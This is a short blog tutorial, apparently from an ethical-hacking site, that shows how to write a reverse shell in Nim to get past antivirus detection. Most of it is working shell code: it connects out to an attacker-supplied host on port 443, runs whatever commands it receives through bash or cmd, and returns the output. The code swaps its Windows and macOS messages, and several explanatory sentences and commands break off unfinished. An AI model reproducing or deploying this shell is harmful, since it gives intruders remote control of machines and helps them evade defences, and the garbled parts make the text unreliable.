In this tutorial, you will learn how to write a reverse shell in Nim to bypass antivirus detection.
Table of Contents
What Is Nim?
Nim is a scripting language similar to Python in syntax, but close to Golang in that it requires statically typed variables and it compiles its programs.
Why Use Nim?
However you feel about Python or Golang for that matter, Nim is worth looking at for offensive programming.
- Very mature FFI (Foreign Functiong Interface)
- Smaller compiled binaries than Golang. (KB’s versus 200+ KB)
- Cross-compilation support with mingw-64, similar to Golang.
- Can call the Windows API directly via the FFI
Want to learn more ethical hacking? I highly recommend buying my book made for beginners to Pentesting Become An Ethical Hacker. Check the price on Amazon.
Here’s What You Need
- Kali Linux VM
- Windows 10 VM
Once you install Nim in Kali Linux you can compile the program like so:
Write A Reverse Shell In Nim
A reverse shell is a good way to get started in writing offensive tooling in Nim. The syntax will be similar to Python, but more efficient in execution like Golang. Get the code for the reverse shell from The Ethical Hacking Guru Github.
You will not need to download any additional modules to run this code.
import os, net, osproc var sock = newSocket() proc run(TARGET: string, RPORT: int): void = when system.hostOS == "macosx": echo "running on Windows!" try: sock.connect(TARGET, PORT(RPORT)) while true: let cmd = sock.recvLine() if cmd == "exit": break let result = execProcess("bash -c " & cmd) sock.send(result) except: raise finally: sock.close when system.hostOS == "windows": echo "running on Mac OS X!" try: sock.connect(TARGET, PORT(RPORT)) while true: let cmd = sock.recvLine() if cmd == "exit": break let result = execProcess("cmd /c " & cmd) sock.send(result) except: raise finally: sock.close when isMainModule: try: let RPORT = 443 let TARGET = paramStr(1) run(TARGET, RPORT) except: raise
The code is pretty simple, Nim is statically typed so that means you have to declare the variable type when you declare a variable for the first time. Proc means you are defining a function, and it requires the return object type too see
The
Cross compiling from Linux to Windows is simple all you need to do is download the mingw-w64 binary with
Recommended Reading
Want to learn more ethical hacking? I highly recommend buying my book made for beginners to Pentesting Become An Ethical Hacker. Check the price on Amazon.